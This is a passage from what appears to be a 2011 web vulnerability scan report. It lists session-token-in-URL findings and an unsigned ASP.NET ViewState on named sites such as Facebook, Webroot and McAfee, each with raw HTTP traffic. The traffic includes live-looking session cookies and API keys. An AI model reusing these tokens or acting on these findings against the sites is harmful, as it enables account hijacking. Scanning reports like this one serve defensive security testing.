GET /extern/login_status.php?api_key=4a27a904c492f128d46163d02575765c&app_id=4a27a904c492f128d46163d02575765c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c83bcec%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b69b11f%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df55671958%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d27c7a2c%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df345055be%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/extern/login_status.php?api_key=4a27a904c492f128d46163d02575765c&app_id=4a27a904c492f128d46163d02575765c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c83bcec%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b69b11f%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df55671958%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d27c7a2c%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df345055be%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff3e8866578%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff901adcc&sdk=joey&session_version=3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.54.35
X-Cnection: close
Date: Sun, 17 Apr 2011 14:24:11 GMT
Content-Length: 0


9.15. http://www.hldataprotection.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hldataprotection.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.hldataprotection.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 17 Apr 2011 14:18:18 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Thu, 14 Apr 2011 06:21:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=i-15e5bf7e; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<p>Senator Kerry offered this overview on <a href="http://kerry.senate.gov/work/issues/issue/?id=74638d00-002c-4f5e-9709-1cb51c6759e6&amp;CFID=74370047&amp;CFTOKEN=46575664">his web site</a>
...[SNIP]...

9.16. http://www.pages05.net/WTS/event.jpeg

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.pages05.net
Path:   /WTS/event.jpeg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /WTS/event.jpeg?accesskey=7e29f616-12c999824aa-c6f842ded9e6d11c5ffebd715e129037&v=1.03&isNewSession=1&type=pageview&isNewVisitor=1&sessionGUID=20a481a9-716c-08d8-9179-6804e373028e&webSyncID=1b371563-da21-14c5-db4d-407b95beb159&url=http%3A%2F%2Fwww.dealer.com%2F&newSiteVisit=1&hostname=www.dealer.com&pathname=%2F&pagename=%2F&newPageVisit=1&requestGuid=12645631-b918-5e45-66bd-2a0d5760bd1e HTTP/1.1
Host: www.pages05.net
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:02:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=B7AD23E107C3396C1AE21FEEE67146D9; Path=/
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 70
Connection: close
Content-Type: image/png
Set-Cookie: BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.webroot.com
Path:   /En_US/about-press-room-in-the-news.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /En_US/about-press-room-in-the-news.html HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 57774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<p>
<a href="http://www.crn.com/security/222500159;jsessionid=LBRX4NVGHML15QE1GHRSKHWATMY32JVN?queryText=20+coolest+cloud+security" target="_blank">Read more</a> <a href="http://www.crn.com/security/222500159;jsessionid=LBRX4NVGHML15QE1GHRSKHWATMY32JVN?queryText=20+coolest+cloud+security" target="_blank"><img src="/shared/img_structure/new-window.gif" border="0" align="middle">
...[SNIP]...

10. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Request

GET /secure/cart/?offerId=285986&PkgQty=1 HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: http://promos.mcafee.com/offer.aspx?id=285986
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; SiteID=1; SessionInfo=AffiliateId=0; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; foresee.alive=1303045176255; currentURL=blank; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; Locale=en%2Dus; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; AffID=0; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26langid%3D1; session%5Fdata=%3CSessionData%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E0%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E0%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=720ea228faf811942ab0037780d0be935c4a4c55590b0216&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:41 GMT
Content-Length: 46143


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...